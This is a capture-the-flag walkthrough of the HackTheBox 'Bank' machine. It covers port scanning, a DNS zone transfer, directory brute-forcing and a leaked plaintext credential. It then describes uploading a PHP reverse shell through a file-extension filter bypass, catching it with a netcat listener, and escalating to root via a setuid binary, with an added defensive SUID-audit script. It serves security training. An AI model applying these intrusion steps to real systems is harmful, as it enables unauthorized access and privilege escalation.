HackTheBox Bank Walkthrough

Network Enumeration

As usual, I started the initial enumeration with an nmap port scan to find open ports and the services running on them.

┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ nmap -sC -sV -oN nmap/initial 10.10.10.29
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-06 11:07 IST
Nmap scan report for 10.10.10.29 (10.10.10.29)
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.13 seconds

Three ports are open: SSH on port 22, DNS (ISC BIND) on port 53 and an Apache httpd web server on port 80. Let's start the enumeration with port 53.

DNS - TCP/UDP 53

The nmap scan does not reveal any hostname, so I guessed that it might be bank.htb, and a zone transfer (AXFR) request for that domain works!

┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ dig axfr bank.htb @10.10.10.29

; <<>> DiG 9.18.1-1-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 156 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)
;; WHEN: Mon Jul 11 16:52:40 IST 2022
;; XFR size: 6 records (messages 1, bytes 171)

I added all the hostnames to my /etc/hosts file.

┌──(madhav㉿kali)-[~/ctf/htb]
└─$ cat /etc/hosts     
127.0.0.1       localhost
127.0.1.1       kali
10.10.10.29     bank.htb chris.bank.htb ns.bank.htb www.bank.htb

Web Enumeration

When we visit the URL http://10.10.10.29/ in our web browser, we get the default Apache installation page.

But if we visit http://bank.htb, we get a different website this time.

We have a website with a login form that runs on PHP. I tried logging in with some default credentials, but they didn't work. I also tried bypassing the login page using SQL injection, but that didn't work either.

Next, I ran a gobuster scan to look for hidden files and directories.

┌──(madhav㉿kali)-[~/ctf/htb]
└─$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://bank.htb 
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 302) [Size: 7322] [--> login.php]
/support.php          (Status: 302) [Size: 3291] [--> login.php]
/login.php            (Status: 200) [Size: 1974]                
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/] 
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]    
/server-status        (Status: 403) [Size: 288]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]

===============================================================
Finished
===============================================================

We found many files and directories, but we cannot access most of them because they redirect us back to the login page. However, the /balance-transfer directory is accessible to unauthenticated users.

The /balance-transfer directory contains many files with the .acc extension, each holding an encrypted username and password. One of the files has an oddly different size, and it contains the username and password in plain text.

┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ cat 68576f20e9732f1b2edc4df5b8533230.acc 
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

We can now use these credentials to log in to the website. After logging in, we are presented with a dashboard.

Shell as www-data

In the Support section, we have an option to create a new support ticket, where we can also upload files. But when we try uploading a PHP reverse shell, it gives us an error saying that PHP files are not allowed.

When I checked the source code of the website, I found a comment which says:

It means that we can upload .php files by simply changing the extension to .htb. I will be using the reverse shell by pentestmonkey.

This time the reverse shell was uploaded successfully. Now we can simply execute it from the attachment section.

After executing the shell, we will get a reverse shell back into our system.

┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 49072
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 16:59:44 up  7:28,  0 users,  load average: 0.00, 0.06, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, I upgraded this dumb shell to a fully interactive TTY using the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179

Now that we have a fully interactive shell, we can read our user flag present in the home directory of user chris.

www-data@bank:/$ cat /home/chris/user.txt
2dca09f*************************

Root Shell

I searched for files with the SUID bit set and found an unusual binary.

find / -type f -perm -u=s 2>/dev/null
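The same find command is also how a defender audits a host. As an added example (not part of the walkthrough), here is a small POSIX shell audit that lists setuid files, diffs them against a known-good baseline, and flags ones installed outside the standard system binary directories; the baseline file path is an assumption and the sample tree used to exercise it is constructed.

```shell
# Added example (not from the walkthrough): audit the SUID binaries on a host the way
# a defender would, flagging anything missing from a known-good baseline or installed
# outside the directories where distribution packages normally place setuid files.
# Assumes a baseline file with one expected SUID path per line.

# Print every setuid regular file below the given root, sorted, one per line.
# Errors (unreadable directories) are hidden so the list stays machine-readable.
suid_list() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Print setuid files below $1 that are absent from the baseline file $2.
# Returns 0 when the host matches the baseline, 1 when something unexpected exists.
suid_unexpected() {
    tmp=$(mktemp) || return 2
    sort "$2" > "$tmp"
    found=$(suid_list "$1" | comm -23 - "$tmp")
    rm -f "$tmp"
    printf '%s\n' "$found" | sed '/^$/d'
    [ -z "$found" ]
}

# Print setuid files below $1 that live outside the usual system binary directories
# (the walkthrough's /var/htb/bin/emergency is exactly this kind of outlier).
suid_odd_location() {
    root=${1%/}                       # "" when auditing "/", so paths stay absolute
    suid_list "$1" | while IFS= read -r f; do
        case "${f#"$root"}" in
            /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*) ;;
            *) printf '%s\n' "$f" ;;
        esac
    done
}

# Typical use on a live host: record a baseline right after installation, then
# re-run periodically and alert on any output.
#   suid_list / > /var/lib/suid-baseline.txt
#   suid_unexpected / /var/lib/suid-baseline.txt || echo "ALERT: new setuid files"
#   suid_odd_location /
```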

We have a file named emergency located in the /var/htb/bin directory. First, I ran the file command to check its file type.

www-data@bank:/$ file /var/htb/bin/emergency 
/var/htb/bin/emergency: setuid ELF 32-bit LSB  shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped

It is a 32-bit setuid executable. I tried running this binary and it directly gave us a root shell!

www-data@bank:/$ ./var/htb/bin/emergency 
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
root

We have a root shell and now we can read our final flag present in the /root directory.

# cat /root/root.txt
83a3cee*************************

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Odom Sok.